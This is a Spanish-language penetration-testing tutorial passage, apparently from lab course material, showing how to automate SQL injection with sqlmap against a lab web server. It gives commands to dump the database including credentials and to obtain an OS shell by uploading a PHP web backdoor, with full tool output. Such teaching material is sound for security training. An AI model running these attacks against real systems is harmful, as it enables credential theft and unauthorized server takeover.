Automatización del ataque

Ejecutamos sqlmap en nuestra aplicación web, estableceremos la URL que queremos escanear con -u y especificaremos el parámetro para probar usando -p :

sqlmap -u <http://192.168.50.19/blindsqli.php?user=1> -p user

Para volcar toda la base de datos, incluidas las credenciales de usuario, podemos ejecutar el mismo comando que antes con el parámetro --dump .

sqlmap -u <http://192.168.50.19/blindsqli.php?user=1> -p user --dump

Otra característica central de sqlmap es el parámetro --os-shell , que nos proporciona un shell interactivo completo.

Primero, debemos interceptar la solicitud POST a través de Burp y guardarla como un archivo de texto local en nuestra máquina virtual Kali.

POST /search.php HTTP/1.1
Host: 192.168.50.19
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Origin: <http://192.168.50.19>
Connection: close
Referer: <http://192.168.50.19/search.php>
Cookie: PHPSESSID=vchu1sfs34oosl52l7pb1kag7d
Upgrade-Insecure-Requests: 1

item=test

A continuación, podemos invocar sqlmap con el parámetro -r , utilizando nuestro archivo que contiene la solicitud POST como argumento. También debemos indicar qué parámetro es vulnerable a sqlmap, en nuestro caso item. Finalmente, incluiremos --os-shell junto con la carpeta de escritura personalizada que encontramos anteriormente.

kali@kali:~$ sqlmap -r post.txt -p item  --os-shell  --web-root "/var/www/html/tmp"
...
[*] starting @ 02:20:47 PM /2022-05-19/

[14:20:47] [INFO] parsing HTTP request from 'post'
[14:20:47] [INFO] resuming back-end DBMS 'mysql'
[14:20:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: item (POST)
...
---
[14:20:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.52
back-end DBMS: MySQL >= 5.6
[14:20:48] [INFO] going to use a web backdoor for command prompt
[14:20:48] [INFO] fingerprinting the back-end DBMS operating system
[14:20:48] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[14:20:49] [INFO] using '/var/www/html/tmp' as web server document root
[14:20:49] [INFO] retrieved web server absolute paths: '/var/www/html/search.php'
[14:20:49] [INFO] trying to upload the file stager on '/var/www/html/tmp/' via LIMIT 'LINES TERMINATED BY' method
[14:20:50] [WARNING] unable to upload the file stager on '/var/www/html/tmp/'
[14:20:50] [INFO] trying to upload the file stager on '/var/www/html/tmp/' via UNION method
[14:20:50] [WARNING] expect junk characters inside the file as a leftover from UNION query
[14:20:50] [INFO] the remote file '/var/www/html/tmp/tmpuqgek.php' is larger (713 B) than the local file '/tmp/sqlmapxkydllxb82218/tmp3d64iosz' (709B)
[14:20:51] [INFO] the file stager has been successfully uploaded on '/var/www/html/tmp/' - <http://192.168.50.19:80/tmp/tmpuqgek.php>
[14:20:51] [INFO] the backdoor has been successfully uploaded on '/var/www/html/tmp/' - <http://192.168.50.19:80/tmp/tmpbetmz.php>
[14:20:51] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell> id
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'

os-shell> pwd
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: '/var/www/html/tmp'

Una vez que sqlmap confirma la vulnerabilidad, nos solicita el idioma en el que está escrita la aplicación web, que es PHP en este caso. Luego, sqlmap carga el shell web en la carpeta web especificada y devuelve la shell, desde el cual podemos emitir comandos regulares del sistema.